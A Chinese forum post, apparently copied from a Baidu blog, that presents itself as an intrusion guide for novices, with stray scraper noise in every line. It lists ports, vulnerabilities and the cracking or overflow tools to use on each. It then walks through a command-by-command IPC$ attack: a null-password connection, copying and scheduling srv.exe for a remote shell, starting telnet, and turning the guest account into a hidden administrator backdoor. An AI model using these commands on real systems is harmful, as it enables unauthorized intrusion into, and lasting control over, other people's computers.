TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
2 m, a0 I# B! X* j' v希望对新手入侵有帮助!
7 s8 g0 X! t9 ~- D. K$ i 1. 1433端口入侵# K' j; [; j3 D+ c' I# B' S
scanport.exe 查有1433的机器
% r3 r4 `0 u( e) P, U, H SQLScanPass.exe 进行字典暴破(字典是关键). z: \6 C# e' k! I/ R4 a2 W! [
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
! f' {) \ J$ G8 e9 ]# T# W- y0 N0 D nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口+ N9 M7 E& J( P5 [3 N( `( k
(以上反向的,测试成功)
% j. c+ A P8 j! F+ T* `. v sqlhelloz.exe 入侵ip 1433 (这个是正向连接)( F/ O' q8 t& u8 n
2. 4899端口入侵% w( P' @1 E7 E* Y" c! K
用4899过滤器.exe,扫描空口令的机器
6 ?# ^7 |/ m3 K 3. 3899的入侵
! X! C% Q% y, ^& a9 p3 b 对很早的机器,可以试试3389的溢出(win3389ex.exe): x* U% c% B3 T9 t
对2000的机器,可以试试字典暴破。(tscrack.exe)" m# M, y, }; x9 W1 A: X
4. 80入侵3 v+ U7 V8 r' q* o$ ]7 Q) a+ L
对sp3以前的机器,可以用webdav入侵;3 I) H" H1 O/ ~2 [- }6 T
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)4 q& m' e* ]6 U; z* {
可以利用SQL进行注入。(啊D的注入软件)。( t0 ~5 L: D* l! s" f; i* P+ p
5. serv-u入侵(21端口)/ O g4 K4 y' Q4 P
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
. g# v% K. o- v: i# {1 u 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)9 n( X* Q1 V8 s( y' y9 F- ~8 c
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
' m+ V7 [# V! d$ C. a& t 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
$ M, n& L" Q3 g/ g 6. 554端口
; v' o4 V; @0 g. x8 R 用real554.exe入侵。) t4 ?" N+ I) n8 ~0 W0 }+ R
7. 6129端口
; k. x, B/ E1 q; Z 用DameWare6129.exe入侵。
+ T# ?/ \+ F: \* f* @ 8. 系统漏洞, u) M4 a$ M7 {" h
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
$ ^8 O j$ T" Q2 Q& q% q9. 3127等端口3 N, B* L9 a a: b1 |
2 N3 `0 J3 r1 f1 T
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
/ S4 v# U, }1 d2 A3 s 10. 其他入侵
" ?8 G5 \+ r7 E 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。/ R& U' o; S R; A1 b- ^ ~* |. J
) [! ]& t$ c& h# U! I 经典IPC$入侵
! J3 ?+ m' d$ I# y
/ l* n' ?5 }) \3 a 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" k+ M0 L. |/ m( t# v
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
+ r/ v u3 {/ x& t9 I4 j1 \7 } 2. C:\>copy srv.exe $">\\127.0.0.1\admin$. n3 v& w; [) s: `- l/ c
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
4 O3 ?2 G5 Q! ?) e, ]! @$ e J 3. C:\>net time file://127.0.0.1/( e0 H; Q0 w) \
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。+ X- f L) c$ W' ?. P
4. C:\>at file://127.0.0.1/ 11:05 srv.exe* ]8 x/ e* |3 q; C: v
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.( m: c! |" p# _* X: B9 s
5. C:\>net time file://127.0.0.1/
: S$ _% ?* A. x: i8 c 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
" l! M$ V2 A. ^ l( F 6. C:\>telnet 127.0.0.1 99' B6 V/ E* W6 ~- @
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。4 q6 d7 b: Q& j& {7 @' J" E
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了& Q5 z/ S' \; J4 n
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$3 E# i" K7 n) i( z4 c
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
2 y; b: P) c# Y$ \8 `4 | 8. C:\WINNT\system32>ntlm
7 O: Q, U/ U6 O S5 c! ? 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! S! z+ N8 o. N5 k
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组) ~1 S0 |3 B% T3 T6 @
10. C:\>net user guest /active:yes
- ^/ q5 s- ^5 |- _1 F( t5 U% q 将对方的Guest用户激活
8 Y( Z7 i, x& p% C+ _# r 11. C:\>net user guest 1234) }; n5 M, F2 D) ^6 h
将Guest的密码改为1234,或者你要设定的密码
' _# v; c( Z& [* E3 T 12. C:\>net localgroup administrators guest /add! I; |3 L0 l V% H( K
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|